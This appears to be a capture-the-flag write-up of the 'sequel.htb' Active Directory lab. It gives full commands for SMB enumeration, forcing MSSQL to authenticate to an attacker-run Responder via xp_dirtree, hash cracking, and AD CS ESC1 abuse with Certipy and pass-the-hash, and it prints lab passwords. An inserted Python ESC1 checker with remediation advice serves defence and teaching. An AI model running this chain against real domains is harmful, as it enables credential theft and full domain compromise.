
Scanning and Enumeration


nmap -sSCV --open -p- --min-rate 5000 -n -Pn -oN scan 10.10.11.202

The scan output revealed the domain name of the target, so I added the following entries to my /etc/hosts file:

sequel.htb
dc.sequel.htb
dc

Since SMB is open, I inspected it with NetExec using a guest session (empty password), listing the shares and using the --rid-brute option to enumerate domain accounts by RID cycling.

nxc smb 10.10.11.202 -u 'guest' -p '' --shares --rid-brute

There is an interesting share named “Public”, and RID cycling revealed the following accounts:

Administrator
Guest
krbtgt
DnsAdmins
DnsUpdateProxy
Tom.Henn
Brandon.Brown
Ryan.Cooper
sql_svc
James.Roberts
Nicole.Thompson
SQLServer2005SQLBrowserUser

As usual, I tried AS-REP Roasting against this user list (looking for accounts with Kerberos pre-authentication disabled), but none of them are vulnerable.

Browsing the “Public” share, I found a document called “SQL Server Procedures.pdf”, which contains credentials for MSSQL:

PublicUser
GuestUserCantWrite1

With these credentials we can connect to the database using Impacket's mssqlclient.py:

mssqlclient.py PublicUser:'GuestUserCantWrite1'@10.10.11.202

Exploitation


I enumerated the database looking for useful information but found nothing, and attempts to execute operating-system commands (for example via xp_cmdshell) also failed with this low-privileged login.

One thing you can do with access to an MSSQL database, even without command execution, is to make the SQL Server service account authenticate to an SMB server you control: the xp_dirtree stored procedure takes a UNC path, and the server tries to reach it, sending a Net-NTLMv2 response in the process. That response is not a password hash you can pass around; it is a challenge-response value, but it can be cracked offline to recover the account's password.

In this case I listened with Responder on my attacking interface, triggered the outbound connection from the SQL session, and cracked the captured hash with hashcat (mode 5600 is Net-NTLMv2).

exec xp_dirtree '\\10.10.14.27\share';

hashcat -m 5600 hashes /usr/share/wordlists/rockyou.txt

sql_svc
REGGIE1234ronnie

The credentials are valid for WinRM as well, so I was able to connect to the target with Evil-WinRM:

evil-winrm -i 10.10.11.202 -u sql_svc -p REGGIE1234ronnie

Curiously, the user flag is not present for this account.

Lateral Movement


I enumerated the system and, in the SQL Server logs folder, found plaintext credentials for the user Ryan.Cooper:

sequel.htb\Ryan.Cooper
NuclearMosquito3

Testing the credentials, I found them valid and was able to connect with Evil-WinRM as Ryan.Cooper. The user flag is in this account's directory.

Privilege Escalation


Enumerating the system as Ryan.Cooper turned up nothing obviously useful. Going back to the Nmap output, the scan showed LDAPS and certificate details, which suggests that Active Directory Certificate Services (AD CS) is in use on the domain controller.

To look for misconfigured certificate templates there is the Certify tool:

https://github.com/GhostPack/Certify

I transferred the executable to the victim machine and ran the following command to enumerate the enterprise CAs and the templates they have enabled:

.\Certify.exe cas

Since several templates are enabled, the tool can also check whether any of them is exploitable:

.\Certify.exe find /vulnerable

According to the output, the UserAuthentication template is exploitable because of overly broad settings: any member of “Domain Users” can enroll in it, the enrollee is allowed to supply the subject alternative name, and the resulting certificate is valid for client authentication. Together these are the ESC1 conditions: a low-privileged user can request a certificate carrying another account's UPN and then authenticate as that account.
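The check that Certify and Certipy perform for ESC1 reduces to a handful of template attributes. The following added example (not code from the writeup or from either tool) encodes those conditions, as laid out in SpecterOps' "Certified Pre-Owned" paper, over a constructed set of templates: the template must be published, must let the enrollee supply the subject (msPKI-Certificate-Name-Flag bit 0x1), must not require manager approval (msPKI-Enrollment-Flag bit 0x2) or authorized signatures, must carry a logon-capable EKU (or none at all), and must grant Enroll to a low-privileged principal. The sample templates, including the flag values for UserAuthentication, are assumptions modelled on the writeup's description; the real values are not on the page.

```python
from dataclasses import dataclass
from typing import List, Set

# Flag bits from the msPKI-Certificate-Name-Flag and msPKI-Enrollment-Flag attributes (MS-CRTD).
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # requester may put any SAN/subject in the CSR
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # "CA certificate manager approval" required

# EKUs that let a certificate be used to log on (PKINIT or Schannel).
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}
LOW_PRIV_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}


@dataclass
class Template:
    name: str
    published: bool          # enabled on at least one enterprise CA
    name_flag: int           # msPKI-Certificate-Name-Flag
    enrollment_flag: int     # msPKI-Enrollment-Flag
    ra_signatures: int       # msPKI-RA-Signature: authorized signatures required
    ekus: Set[str]           # pKIExtendedKeyUsage; an empty set means "no EKU" (usable for anything)
    enroll_rights: Set[str]  # principals granted Enroll on the template


def esc1_reasons(t: Template) -> List[str]:
    """Return the ESC1 conditions the template does NOT meet; an empty list means exploitable."""
    reasons = []
    if not t.published:
        reasons.append("not published by any CA")
    if not t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        reasons.append("enrollee cannot supply the subject/SAN")
    if t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS:
        reasons.append("manager approval required")
    if t.ra_signatures > 0:
        reasons.append(f"{t.ra_signatures} authorized signature(s) required")
    if t.ekus and not t.ekus & CLIENT_AUTH_EKUS:
        reasons.append("no client-authentication EKU")
    if not t.enroll_rights & LOW_PRIV_PRINCIPALS:
        reasons.append("no enrollment rights for low-privileged principals")
    return reasons


def find_esc1(templates: List[Template]) -> List[str]:
    """Names of the templates that satisfy every ESC1 condition."""
    return [t.name for t in templates if not esc1_reasons(t)]


# Constructed sample, modelled on the writeup's description; attribute values are assumed.
SAMPLE_TEMPLATES = [
    # The custom template from the box: Domain Users may enroll and supply the SAN.
    Template("UserAuthentication", True, 0x00000001, 0x00000000, 0,
             {"1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.10.3.4", "1.3.6.1.5.5.7.3.4"},
             {"Domain Users", "Domain Admins", "Enterprise Admins"}),
    # A default-style User template: subject is built from AD, so no impersonation.
    Template("User", True, 0xA6000000, 0x00000029, 0,
             {"1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.10.3.4", "1.3.6.1.5.5.7.3.4"},
             {"Domain Users", "Domain Admins", "Enterprise Admins"}),
    # Enrollee supplies subject, but only admins can enroll and the EKU is Server Authentication.
    Template("AdminOnlyWebServer", True, 0x00000001, 0x00000000, 0,
             {"1.3.6.1.5.5.7.3.1"},
             {"Domain Admins"}),
]

if __name__ == "__main__":
    for t in SAMPLE_TEMPLATES:
        print(t.name, "->", esc1_reasons(t) or "ESC1")
```

The fix on the defender's side follows directly from the same list: clear the ENROLLEE_SUPPLIES_SUBJECT flag (or require manager approval) on any template that both carries a logon EKU and is enrollable by broad groups.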

To exploit this from the Linux attacking machine there is Certipy. Here a certificate is requested through the vulnerable template with the Administrator UPN placed in the subject alternative name:

certipy req -u Ryan.Cooper@sequel.htb -p NuclearMosquito3 -template UserAuthentication -upn Administrator@sequel.htb -target sequel.htb -ca sequel-dc-ca

Once the .pfx has been obtained, we can authenticate with it over Kerberos (PKINIT) to obtain a TGT and the NT hash of the Administrator account:

certipy auth -pfx administrator.pfx -domain sequel.htb

With the hash, we can Pass-the-Hash (for example with Evil-WinRM's -H option) to connect as Administrator and read the root flag. One caveat: certipy auth performs a Kerberos exchange, so it fails with KRB_AP_ERR_SKEW if the attacking machine's clock is more than a few minutes off from the domain controller's; synchronize your clock with the target first if that error appears.